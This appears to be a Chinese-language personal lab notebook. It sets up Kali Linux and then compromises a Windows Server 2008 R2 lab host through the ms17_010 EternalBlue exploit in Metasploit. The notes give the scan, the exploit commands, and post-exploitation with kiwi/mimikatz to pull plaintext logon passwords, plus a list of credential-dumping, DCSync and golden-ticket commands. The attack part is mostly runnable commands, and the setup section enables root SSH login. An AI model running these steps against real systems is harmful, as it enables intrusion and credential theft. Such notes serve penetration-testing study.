更新kali源为国内的阿里源
vim /etc/apt/sources.list
deb mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src mirrors.aliyun.com/kali kali-rolling main non-free contrib
apt-get update
开启ssh远程服务
vim /etc/ssh/sshd_config
设置PermitRootLogin yes
PubKeyAuthentication yes
port 22,去掉注释
systemctl restart ssh
systemctl status ssh
msf入侵windows server 2008R2
kali linux 192.168.147.211
windows server 2008R2 192.168.147.226
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Nmap scan report for 192.168.147.226
Host is up (0.00084s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
msfconsole
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010,检测是否存在漏洞
set RHOSTS 192.168.147.226
run
use exploit/windows/smb/ms17_010_eternalblue,发起攻击
set RHOSTS 192.168.147.226
run
攻击成功
screenshot
load -l,可以加载出能用的模块,mimikatz被kiwi取代了
bofloader
espia
extapi
incognito
kiwi
lanattacks
peinjector
powershell
priv
python
sniffer
stdapi
unhook
winpmem
load kiwi
kiwi_cmd sekurlsa::logonpasswords,提取登录用户的明文密码
creds_all
migrate 504,可以让kiwi运行的更加稳定
help kiwi
creds_all:检索所有凭证(已解析)
creds_kerberos:获取Kerberos凭证(已解析)
creds_livessp:获取Live SSP凭证
creds_msv:获取LM/NTLM凭证(已解析)
creds_ssp:获取SSP凭证
creds_tspkg:获取TsPkg凭证(已解析)
creds_wdigest:获取WDigest凭证(已解析)
dcsync:通过DCSync获取用户账户信息(未解析)
dcsync_ntlm:通过DCSync获取用户账户NTLM哈希、安全标识符(SID)和相对标识符(RID)
golden_ticket_create:创建黄金Kerberos票据
kerberos_ticket_list:列出所有Kerberos票据(未解析)
kerberos_ticket_purge:清除所有正在使用的Kerberos票据
kerberos_ticket_use:使用一个Kerberos票据
kiwi_cmd:执行任意Mimikatz命令(未解析)
lsa_dump_sam:转储LSA的安全帐户管理器数据库(未解析)
lsa_dump_secrets:转储LSA机密(未解析)
password_change:更改用户的密码或哈希
wifi_list:列出当前用户的Wi-Fi配置文件及凭证
wifi_list_shared:列出共享的Wi-Fi配置文件及凭证(需要SYSTEM权限)
shell,进入windows命令行
